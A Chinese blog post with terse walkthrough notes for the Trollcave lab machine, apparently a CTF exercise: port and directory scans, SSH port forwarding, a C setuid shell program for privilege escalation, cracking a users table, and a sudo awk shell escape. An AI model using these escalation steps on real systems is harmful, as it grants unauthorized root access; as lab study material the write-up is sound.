一 扫描端口

扫描开放端口：nmap -sV -sC -p- 192.168.0.149 -oA trollcave-allports

扫描敏感目录:gobuster dir -u http://192.168.0.149 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

二 信息收集

netstat -lntp 查看端口信息

ssh -L 8888:localhost:8888 端口转发

通过setuid来提权

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

int main(int argc,char *argv[])

{setreuid(1000,1000);//etc/passwd

execve("/bin/sh",NULL,NULL);

}

base64 exp [空格]

让所有用户都可以使用。

chmod 4755

5432是postsql的端口号

sqlite select * from users; 密码是可进行破解的，运行出来全是明文，可以直接去碰撞的

enter+shift+~+大写C 进行ssh

sudo -l 查看当前权限

/etc/sudoers 去掉

awk 可以执行系统命令 sudo awk'{system('/bin/bash')}''

最新文章

1. HttpClient在HTTP协议接口测试中的使用
2. 【代码笔记】iOS-通过颜色来生成一个纯色图片
3. Python 开平方
4. include指令和include标签的区别
5. HTML5和css3的总结四
6. 13年省赛-B题-连通分量
7. iOS 全局竖屏 单个viewcontroller点击按钮支持横屏
8. form 表单练习
9. [开源]在iOS上实现Android风格的控件Toast
10. .net 实战 根据configuration选项生成不同的config文件
11. scrapy爬取数据进行数据库存储和本地存储
12. NewLife.Net——开始网络编程
13. github ignore 规范
14. BM递推
15. QT学习之第一个程序
16. Tensorflow（二）
17. UVA-818 Cutting Chains （位压缩+暴力搜索）
18. UITableView分页
19. Proxy account failing to run SSIS Error (Proxy (11) is not allowed for subsystem "SSIS" and user "AB\testuser ".
20. Machine Learning笔记整理 ------ （一）基本概念

热门文章

1. 精尽Spring MVC源码分析 - HandlerAdapter 组件（二）之 ServletInvocableHandlerMethod
2. windows 10 1909 无法启用 .NET Framework 解决
3. beautiful soup 遇到class标签的值中含有空格的处理
4. 使用php进行微信小程序图片安全验证
5. 附028.Kubernetes_v1.20.0高可用部署架构二
6. Windows系统/office安装与激活
7. 解决WebStorme点击谷歌浏览器图标无反应问题
8. [转载]Mybatis Generator最完整配置详解
9. BPF的可移植性和CO-RE (Compile Once – Run Everywhere）
10. jQuery 库中的 $() 是什么？